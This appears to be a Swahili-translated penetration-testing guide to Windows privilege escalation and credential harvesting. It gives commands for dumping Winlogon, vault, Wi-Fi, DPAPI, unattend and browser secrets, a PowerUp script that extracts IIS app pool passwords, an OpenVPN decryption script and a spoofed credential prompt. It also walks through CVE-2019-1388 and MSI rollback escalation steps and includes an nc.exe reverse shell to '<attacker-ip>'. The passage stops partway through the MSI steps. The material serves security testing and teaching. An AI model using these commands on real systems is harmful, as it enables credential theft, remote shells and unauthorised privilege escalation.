Angalia kwa ajili ya restricted services kutoka nje

netstat -ano #Opened ports?

Jedwali la Njia

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

Jedwali la ARP

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

Firewall Rules

Angalia ukurasa huu kwa amri zinazohusiana na Firewall (orodhesha rules, unda rules, zima, zima...)

Zaidi commands for network enumeration here

Windows Subsystem for Linux (wsl)

C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe

Faili binari bash.exe pia inaweza kupatikana katika C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

Ikiwa utapata root user unaweza kusikiliza kwenye bandari yoyote (mara ya kwanza unapotumia nc.exe kusikiliza kwenye bandari itakuuliza kupitia GUI ikiwa nc inapaswa kuruhusiwa na firewall).

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

Ili kuanza bash kama root kwa urahisi, unaweza kujaribu --default-user root

Unaweza kuchunguza filesystem ya WSL katika folda C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Windows Credentials

Winlogon Credentials

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

Credentials manager / Windows vault

From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
The Windows Vault huhifadhi credentials za watumiaji kwa servers, websites na programu zingine ambazo Windows inaweza kuingia kwa watumiaji kiotomatiki. Mwanzo, inaweza kuonekana kama watumiaji wanaweza kuhifadhi Facebook credentials, Twitter credentials, Gmail credentials n.k., ili wao waingia moja kwa moja kupitia browsers. Lakini sivyo.

Windows Vault huhifadhi credentials ambazo Windows inaweza kutumia kuingia watumiaji kiotomatiki, ambayo ina maana kwamba programu yoyote ya Windows application that needs credentials to access a resource (server or a website) can make use of this Credential Manager & Windows Vault na kutumia credentials zilizotolewa badala ya watumiaji kuingiza username na password kila mara.

Isipokuwa programu hizo zinashirikiana na Credential Manager, sipatiamini kuwa zinaweza kutumia credentials za rasilimali fulani. Hivyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani kuwasiliana na credential manager na kuomba credentials za rasilimali hiyo kutoka kwa default storage vault.

Tumia cmdkey kuorodhesha credentials zilizohifadhiwa kwenye mashine.

cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

Kisha unaweza kutumia runas kwa chaguo /savecred ili kutumia saved credentials. Mfano ufuatao unaita remote binary kupitia SMB share.

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

Kutumia runas na seti ya credential zilizotolewa.

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Kumbuka kwamba mimikatz, lazagne, credentialfileview, VaultPasswordView, au kutoka kwa Empire Powershells module.

DPAPI

The Data Protection API (DPAPI) inatoa njia ya encryption ya symmetriki kwa data, inayotumika kwa kiasi kikubwa ndani ya mfumo wa uendeshaji wa Windows kwa encryption ya symmetriki ya funguo binafsi za asymmetric. Encryption hii inategemea siri ya mtumiaji au ya mfumo ili kuongeza entropia kwa kiasi kikubwa.

DPAPI inaruhusu encryption ya funguo kupitia funguo simmetriki inayotokana na siri za kuingia za mtumiaji. Katika matukio yanayohusisha encryption ya mfumo, hutumia siri za uthibitisho za domain za mfumo.

Funguo za RSA za mtumiaji zilizofichwa kwa kutumia DPAPI zinahifadhiwa katika saraka %APPDATA%\Microsoft\Protect{SID}, ambapo {SID} inawakilisha Security Identifier ya mtumiaji. Funguo ya DPAPI, iliyoko pamoja na master key inayolinda funguo binafsi za mtumiaji katika faili hiyo hiyo, kwa kawaida inaundwa na 64 bytes za data ya nasibu. (Ni muhimu kutambua kuwa upatikanaji wa saraka hii umepunguzwa, ukizuia kuorodhesha yaliyomo kwa kutumia amri dir katika CMD, ingawa inaweza kuorodheshwa kupitia PowerShell).

Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\

Unaweza kutumia mimikatz module dpapi::masterkey na vigezo vinavyofaa (/pvk au /rpc) ili ku-decrypt.

Mafaili ya credentials yaliyolindwa na master password kwa kawaida yapo katika:

dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Unaweza kutumia mimikatz module dpapi::cred na /masterkey inayofaa ili ku-decrypt.
Unaweza extract many DPAPI masterkeys kutoka memory kwa kutumia module sekurlsa::dpapi (ikiwa wewe ni root).

{{#ref}} dpapi-extracting-passwords.md {{#endref}}

PowerShell Credentials

PowerShell credentials mara nyingi hutumika kwa scripting na automation tasks kama njia ya kuhifadhi encrypted credentials kwa urahisi. Credentials zinalindwa kwa kutumia DPAPI, ambayo kwa kawaida ina maana kwamba zinaweza tu kuwa decrypted na user huyo kwenye computer ile ile walipoundwa.

Ili decrypt PS credentials kutoka kwenye file inayoiweka unaweza kufanya:

PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username

john

PS C:\htb> $credential.GetNetworkCredential().password

JustAPWD!

Mtandao wa Wi-Fi

#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*

Miunganisho ya RDP Iliyohifadhiwa

Unaweza kuzipata kwenye HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
na katika HKCU\Software\Microsoft\Terminal Server Client\Servers\

Amri zilizotekelezwa hivi karibuni

HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Meneja wa Uthibitisho wa Remote Desktop

%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings

Tumia Mimikatz dpapi::rdg module pamoja na /masterkey inayofaa ili decrypt any .rdg files
Unaweza extract many DPAPI masterkeys kutoka memory kwa kutumia Mimikatz sekurlsa::dpapi module

Sticky Notes

Watu mara nyingi hutumia app ya StickyNotes kwenye workstations za Windows kuhifadhi save passwords na taarifa nyingine, bila kutambua kuwa ni faili ya database. Faili hii iko kwenye C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite na inastahili kutafutwa na kuchunguzwa.

AppCmd.exe

Kumbuka kwamba ili recover passwords kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha chini ya High Integrity level.
AppCmd.exe iko katika %systemroot%\system32\inetsrv\ directory.
Ikiwa faili hii ipo basi inawezekana kwamba baadhi ya credentials zimetangazwa na zinaweza recovered.

Msimbo huu ulitolewa kutoka PowerUP:

function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"

# Check if appcmd.exe exists
if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable

# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")

# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {

# Get application pool name
$PoolName = $_

# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd

# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd

# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}

# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {

# Get Virtual Directory Name
$VdirName = $_

# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd

# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd

# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}

# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}

SCClient / SCCM

Angalia ikiwa C:\Windows\CCM\SCClient.exe inapatikana.
Installers zinaendeshwa kwa SYSTEM privileges, nyingi zinaweza kuathiriwa na DLL Sideloading (Taarifa kutoka https://github.com/enjoiz/Privesc).

$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }

Mafaili na Registry (Credentials)

Putty Creds

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

Putty SSH Vifunguo vya Mwenyeji

reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\

SSH keys in registry

SSH private keys zinaweza kuhifadhiwa ndani ya registry key HKCU\Software\OpenSSH\Agent\Keys, hivyo unapaswa kuangalia kama kuna kitu chochote cha kuvutia huko:

reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'

Ikiwa utapata kipengee chochote ndani ya njia hiyo, huenda ni SSH key iliyohifadhiwa.
Imehifadhiwa ikiwa imesimbwa lakini inaweza kufunguliwa kwa urahisi kwa kutumia https://github.com/ropnop/windows_sshagent_extract.
Maelezo zaidi kuhusu mbinu hii hapa: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/

Ikiwa huduma ya ssh-agent haifanyi kazi na unataka iianzishwe kiotomatiki wakati wa kuanzisha mfumo, endesha:

Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service

Tip

Inaonekana mbinu hii haifanyi kazi tena. Nilijaribu kuunda baadhi ya ssh keys, kuziongeza kwa ssh-add na kuingia via ssh kwenye mashine. Rejista HKCU\Software\OpenSSH\Agent\Keys haipo na procmon hakutambua matumizi ya dpapi.dll wakati wa uthibitishaji wa funguo zisizo sawa.

Mafaili yasiyotunzwa

C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Unaweza pia kutafuta mafaili haya kwa kutumia metasploit: post/windows/gather/enum_unattend

Mfano wa yaliyomo:

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>

<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>

Nakala za chelezo za SAM & SYSTEM

# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Vyeti vya Cloud

#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json

McAfee SiteList.xml

Tafuta faili liitwalo SiteList.xml

Cached GPP Pasword

A feature was previously available that allowed the deployment of custom local administrator accounts on a group of machines via Group Policy Preferences (GPP). However, this method had significant security flaws. Firstly, the Group Policy Objects (GPOs), stored as XML files in SYSVOL, could be accessed by any domain user. Secondly, the passwords within these GPPs, encrypted with AES256 using a publicly documented default key, could be decrypted by any authenticated user. This posed a serious risk, as it could allow users to gain elevated privileges.

Ili kupunguza hatari hii, kazi ilitengenezwa kukagua faili za GPP zilizohifadhiwa kwa ndani zenye shamba la "cpassword" ambalo si tupu. Baada ya kupata faili kama hilo, kazi inafungua nenosiri na kurejesha PowerShell object maalum. Object hii inajumuisha maelezo kuhusu GPP na eneo la faili, kusaidia katika utambuzi na utengenzaji wa hitilafu hii ya usalama.

Tafuta katika C:\ProgramData\Microsoft\Group Policy\history au katika C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (kabla ya W Vista) kwa faili hizi:

Groups.xml
Services.xml
Scheduledtasks.xml
DataSources.xml
Printers.xml
Drives.xml

Ili kufungua cPassword:

#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

Kutumia crackmapexec kupata nywila:

crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin

IIS Usanidi wa Wavuti

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Mfano wa web.config ulio na maelezo ya kuingia:

<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>

Taarifa za kuingia za OpenVPN

Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}

foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]

$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)

Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}

Logs

# IIS
C:\inetpub\logs\LogFiles\*

#Apache
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

Omba credentials

Unaweza kila wakati kumwomba mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine ikiwa unadhani anaweza kuzijua (kumbuka kwamba kuuliza mteja moja kwa moja kwa credentials ni kweli hatari):

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password

#Get plaintext
$cred.GetNetworkCredential() | fl

Majina ya faili yanayoweza kuwa na credentials

Faili zilizojulikana ambazo wakati fulani zilikuwa na passwords katika clear-text au Base64

$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db         #Firefox
key4.db         #Firefox
places.sqlite   #Firefox
"Login Data"    #Chrome
Cookies         #Chrome
Bookmarks       #Chrome
History         #Chrome
TypedURLsTime   #IE
TypedURLs       #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

Tafuta faili zote zilizopendekezwa:

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"

Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

Credentials katika RecycleBin

Pia unapaswa kuangalia Bin kutafuta credentials ndani yake

Ili recover passwords zilizohifadhiwa na programu kadhaa unaweza kutumia: http://www.nirsoft.net/password_recovery_tools.html

Ndani ya registry

Registry keys nyingine zinazoweza kuwa na credentials

reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"

Extract openssh keys from registry.

Historia za vivinjari

Unapaswa kuangalia dbs ambapo nywila kutoka Chrome or Firefox zinahifadhiwa.
Pia angalia history, bookmarks na favourites za vivinjari ili labda baadhi ya nywila zimetunzwa hapo.

Zana za kutoa nywila kutoka kwa vivinjari:

Mimikatz: dpapi::chrome
SharpWeb
SharpChromium
SharpDPAPI

COM DLL Overwriting

Component Object Model (COM) ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu mawasiliano kati ya vipengele vya programu vilivyotengenezwa kwa lugha tofauti. Kila COM component inaitambulika kupitia class ID (CLSID) na kila component inaonyesha kazi kupitia interface moja au zaidi, zinazoainishwa kwa interface IDs (IIDs).

COM classes na interfaces zimefafanuliwa katika registry chini ya HKEY\CLASSES\ROOT\CLSID na HKEY\CLASSES\ROOT\Interface mtawalia. Registry hii inaundwa kwa kuunganisha HKEY\LOCAL\MACHINE\Software\Classes + HKEY\CURRENT\USER\Software\Classes = HKEY\CLASSES\ROOT.

Ndani ya CLSIDs za registry hii unaweza kupata registry mdogo InProcServer32 ambayo ina thamani ya default inayoelekeza kwa DLL na thamani iitwayo ThreadingModel inayoweza kuwa Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) au Neutral (Thread Neutral).

Kwa msingi, ikiwa unaweza kuandika upya yoyote ya DLLs ambazo zitatekelezwa, unaweza escalate privileges ikiwa DLL hiyo itatekelezwa na mtumiaji tofauti.

To learn how attackers use COM Hijacking as a persistence mechanism check:

{{#ref}} com-hijacking.md {{#endref}}

Utafutaji wa nywila wa jumla katika faili na registry

Tafuta yaliyomo kwenye faili

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

Tafuta faili lenye jina fulani

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Tafuta kwenye registry kwa key names na passwords

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d

Vyombo vinavyotafuta passwords

MSF-Credentials Plugin is a msf plugin. Niliitengeneza plugin hii ili automatically execute every metasploit POST module that searches for credentials ndani ya victim.
Winpeas inatafuta moja kwa moja faili zote zenye passwords zilizotajwa kwenye ukurasa huu.
Lazagne ni zana nyingine nzuri ya kutoa password kutoka kwenye system.

Kifaa SessionGopher hutafuta sessions, usernames na passwords za zana kadhaa ambazo zinaokoa data hii kwa clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Leaked Handlers

Fikiria kwamba mchakato unaoendesha kama SYSTEM unafungua mchakato mpya (OpenProcess()) kwa full access. Mchakato huo huo pia huunda mchakato mpya (CreateProcess()) uneo low privileges lakini unarithi (inherits) handles zote zinazofunguliwa za mchakato mkuu.
Kisha, ikiwa una full access kwa mchakato mwenye low privileges, unaweza kuchukua open handle ya mchakato wenye privileji iliyoundwa na OpenProcess() na kuingiza shellcode.
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access).

Named Pipe Client Impersonation

Shared memory segments, referred to as pipes, zinaruhusu mawasiliano ya mchakato na uhamishaji wa data.

Windows ina kipengele kinachoitwa Named Pipes, kinachoruhusu michakato isiyohusiana kushirikiana data, hata kwa mitandao tofauti. Hii ni sawa na usanifu wa client/server, ambapo majukumu ni named pipe server na named pipe client.

Wakati data inapotumwa kupitia pipe na client, server iliyosanidi pipe ina uwezo wa kujichukua utambulisho wa client, kama ina haki za SeImpersonate. Kutambua privileged process inayowasiliana kupitia pipe ambayo unaweza kuiga kunatoa fursa ya kupata higher privileges kwa kuchukua utambulisho wa mchakato huo mara inapoingiliana na pipe uliyoianzisha. Kwa maelekezo ya jinsi ya kutekeleza shambulio kama hili, mwongozo muhimu upo here na here.

Vivyo hivyo, zana ifuatayo inaruhusu kuintercept mawasiliano ya named pipe kwa zana kama burp: https://github.com/gabriel-sztejnworcel/pipe-intercept na zana hii inaruhusu kuorodhesha na kuona pipes zote ili kupata privescs https://github.com/cyberark/PipeViewer

Misc

File Extensions that could execute stuff in Windows

Angalia ukurasa https://filesec.io/

Monitoring Command Lines for passwords

Unapopata shell kama user, kunaweza kuwa na scheduled tasks au michakato mingine inayotekelezwa ambayo pass credentials on the command line. Script hapa chini inakamata process command lines kila sekunde mbili na kulinganisha hali ya sasa na ile ya awali, ikitoa tofauti yoyote.

while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}

Stealing passwords from processes

From Low Priv User to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass

Iwapo una ufikiaji wa kiolesura cha picha (kupitia console au RDP) na UAC imewezeshwa, katika toleo fulani za Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama "NT\AUTHORITY SYSTEM" kutoka kwa mtumiaji asiye na ruhusa.

Hii inafanya iwezekane kuinua ruhusa na kupitisha UAC kwa wakati mmoja kupitia udhaifu uleule. Zaidi ya hayo, hakuna haja ya kusanikisha chochote na binary inayotumika wakati wa mchakato imewekwa saini na kutolewa na Microsoft.

Baadhi ya mifumo iliyoharibiwa ni yafuatayo:

SERVER
======

Windows 2008r2	7601	** link OPENED AS SYSTEM **
Windows 2012r2	9600	** link OPENED AS SYSTEM **
Windows 2016	14393	** link OPENED AS SYSTEM **
Windows 2019	17763	link NOT opened


WORKSTATION
===========

Windows 7 SP1	7601	** link OPENED AS SYSTEM **
Windows 8		9200	** link OPENED AS SYSTEM **
Windows 8.1		9600	** link OPENED AS SYSTEM **
Windows 10 1511	10240	** link OPENED AS SYSTEM **
Windows 10 1607	14393	** link OPENED AS SYSTEM **
Windows 10 1703	15063	link NOT opened
Windows 10 1709	16299	link NOT opened

Ili kutumia udhaifu huu, ni lazima ufanye hatua zifuatazo:

1) Right click on the HHUPD.EXE file and run it as Administrator.

2) When the UAC prompt appears, select "Show more details".

3) Click "Show publisher certificate information".

4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.

5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.

6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.

7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.

8) Remember to cancel setup and the UAC prompt to return to your desktop.

Una faili zote muhimu na taarifa kwenye GitHub repository ifuatayo:

https://github.com/jas502n/CVE-2019-1388

From Administrator Medium to High Integrity Level / UAC Bypass

Read this to learn about Integrity Levels:

{{#ref}} integrity-levels.md {{#endref}}

Then read this to learn about UAC and UAC bypasses:

{{#ref}} ../authentication-credentials-uac-and-efs/uac-user-account-control.md {{#endref}}

From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP

The technique described in this blog post with a exploit code available here.

Shambulio hili kwa ujumla linajumuisha kutumia kipengele cha rollback cha Windows Installer kubadilisha faili halali na za kibaya wakati wa mchakato wa uninstall. Kwa hili mshambuliaji anahitaji kuunda malicious MSI installer ambao utakayotumika kupora folda ya C:\Config.Msi, ambayo baadaye Windows Installer itaitumia kuhifadhi faili za rollback wakati wa uninstall ya vifurushi vingine vya MSI ambapo faili za rollback zingeweza kubadilishwa kuwa na payload ya kuharibu.

Mbinu iliyoorodheshwa kwa kifupi ni kama ifuatavyo:

Stage 1 – Preparing for the Hijack (leave C:\Config.Msi empty)

Step 1: Install the MSI
Tengeneza .msi inayosakinisha faili isiyo hatari (mfano, dummy.txt) katika folda inayoweza kuandikwa (TARGETDIR).
Changanua installer kama "UAC Compliant", ili non-admin user aweze kuikimbiza.
Weka handle wazi kwa faili baada ya kusakinisha.
Step 2: Begin Uninstall
Uninstall .msi ile ile.
Mchakato wa uninstall unaanza kuhamisha faili hadi C:\Config.Msi na kuzipatia majina mpya kwa .rbf (rollback backups).
Fuatilia handle iliyofunguliwa kwa kutumia GetFinalPathNameByHandle ili kugundua wakati faili inaporudiwa kuwa C:\Config.Msi\<random>.rbf.
Step 3: Custom Syncing
.msi inajumuisha custom uninstall action (SyncOnRbfWritten) ambayo:
Inaashiria wakati .rbf imeandikwa.
Kisha inasubiri kwenye event nyingine kabla ya kuendelea na uninstall.
Step 4: Block Deletion of .rbf
